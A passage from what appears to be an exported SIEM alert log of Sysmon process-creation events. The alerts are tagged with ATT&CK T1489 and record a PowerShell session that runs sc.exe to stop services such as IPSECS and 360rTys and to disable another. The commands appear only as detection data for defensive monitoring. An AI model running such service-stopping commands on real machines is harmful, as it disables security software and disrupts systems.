Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.246",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.091 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001031b93000} +ProcessId: 5396 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.097265400Z"",""eventRecordID"":""3850"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.091\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001031b93000}\r\nProcessId: 5396\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.091"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001031b93000}"",""processId"":""5396"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.187",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.942 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001043b63000} +ProcessId: 2344 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.945523800Z"",""eventRecordID"":""3847"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.942\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001043b63000}\r\nProcessId: 2344\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.942"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001043b63000}"",""processId"":""2344"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.139",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.791 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001040b33000} +ProcessId: 6672 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfyxxx +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.804236000Z"",""eventRecordID"":""3844"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.791\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001040b33000}\r\nProcessId: 6672\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfyxxx\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.791"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001040b33000}"",""processId"":""6672"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfyxxx"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.124",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.753 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001060b23000} +ProcessId: 8076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Xtfyxxx Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Xtfyxxx Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.760384100Z"",""eventRecordID"":""3843"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.753\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001060b23000}\r\nProcessId: 8076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Xtfyxxx Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.753"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001060b23000}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config Xtfyxxx Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.983",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.710 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010afb03000} +ProcessId: 7804 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfya +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.714248400Z"",""eventRecordID"":""3841"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.710\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010afb03000}\r\nProcessId: 7804\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfya\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.710"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010afb03000}"",""processId"":""7804"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfya"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.944",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.660 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-001034ae3000} +ProcessId: 5104 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Xtfy +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.664782900Z"",""eventRecordID"":""3838"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.660\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001034ae3000}\r\nProcessId: 5104\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Xtfy\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.660"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001034ae3000}"",""processId"":""5104"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Xtfy"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.890",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.625 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00109aac3000} +ProcessId: 1408 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® 